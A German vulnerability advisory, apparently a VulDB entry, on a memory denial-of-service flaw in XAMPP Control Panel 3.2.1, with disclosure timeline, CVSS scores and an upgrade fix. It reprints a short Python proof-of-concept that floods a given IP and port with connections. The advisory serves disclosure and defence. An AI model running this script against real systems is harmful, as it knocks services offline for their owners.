📚 XAMPP Control Panel 3.2.1 Memory Denial of Service
💡 Newskategorie: Sicherheitslücken
🔗 Quelle: vuldb.com
Es wurde eine problematische Schwachstelle in XAMPP Control Panel 3.2.1 gefunden. Dabei betrifft es eine unbekannte Funktion. Mittels Manipulieren mit einer unbekannten Eingabe kann eine Denial of Service-Schwachstelle (Memory) ausgenutzt werden. Die Auswirkungen sind bekannt für Vertraulichkeit, Integrität und Verfügbarkeit.
Die Schwachstelle wurde am 24.12.2016 durch John Page (hyp3rlinx) als XAMPP Control Panel Memory Corruption Denial Of Service in Form eines bestätigten Mailinglist Posts (Bugtraq) publiziert. Das Advisory kann von seclists.org heruntergeladen werden. Die Herausgabe passierte in Zusammenarbeit mit XAMPP. Der Angriff kann über das Netzwerk erfolgen. Es sind zwar keine technische Details, jedoch ein öffentlicher Exploit zur Schwachstelle bekannt.
Ein öffentlicher Exploit wurde durch John Page realisiert und direkt nach dem Advisory veröffentlicht. Er wird als proof-of-concept gehandelt. Der Exploit wird unter seclists.org bereitgestellt. Vor einer Veröffentlichung handelte es sich 51 Tage um eine Zero-Day Schwachstelle. Während dieser Zeit erzielte er wohl etwa $0-$5k auf dem Schwarzmarkt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:
import socket print "XAMPP Control Panel DOS" print "Discovery: John Page (hyp3rlinx)" print "ApparitionSec" print "hyp3rlinx.altervista.org\r\n" IP = raw_input("[IP]> ") PORT = raw_input("[PORT]> ") arr=[] c=0 while 1: try: arr.append(socket.create_connection((IP,PORT))) arr[c].send("DOOM") print "Die!" c+=1 except socket.error: print "[+] Done! " raw_input() break
Ein Aktualisieren vermag dieses Problem zu lösen. Das Erscheinen einer Gegenmassnahme geschah vor und nicht erst nach der Veröffentlichung der Schwachstelle. XAMPP hat nachweislich vorgängig gehandelt.
Video
Vimeo: https://vimeo.com/196938261CVSSv3
Base Score: ≈6.3 [?]Temp Score: ≈5.7 [?]
Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C [?]
Zuverlässigkeit: Medium
CVSSv2
Base Score: ≈6.0 (CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P) [?]Temp Score: ≈4.7 (CVSS2#E:POC/RL:OF/RC:C) [?]
Zuverlässigkeit: Medium
CPE
Exploiting
Klasse: Denial of ServiceLokal: Nein
Remote: Ja
Verfügbarkeit: Ja
Zugang: öffentlich
Status: Proof-of-Concept
Autor: John Page
Download: seclists.org
Aktuelle Preisschätzung: $0-$5k (0-day) / $0-$5k (Heute)
Gegenmassnahmen
Empfehlung: UpgradeStatus: Offizieller Fix
Reaction Time: 51 Tage seit gemeldet
0-Day Time: 51 Tage seit gefunden
Exploit Delay Time: 0 Tage seit bekannt
Timeline
01.11.2016 Hersteller informiert04.11.2016 Hersteller bestätigt
22.12.2016 Gegenmassnahme veröffentlicht
24.12.2016 Advisory veröffentlicht
24.12.2016 Exploit veröffentlicht
26.12.2016 VulDB Eintrag erstellt
26.12.2016 VulDB letzte Aktualisierung
Quellen
Advisory: XAMPP Control Panel Memory Corruption Denial Of ServicePerson: John Page (hyp3rlinx)
Status: Bestätigt
Koordiniert: Ja
Eintrag
Erstellt: 26.12.2016Eintrag: 76% komplett
...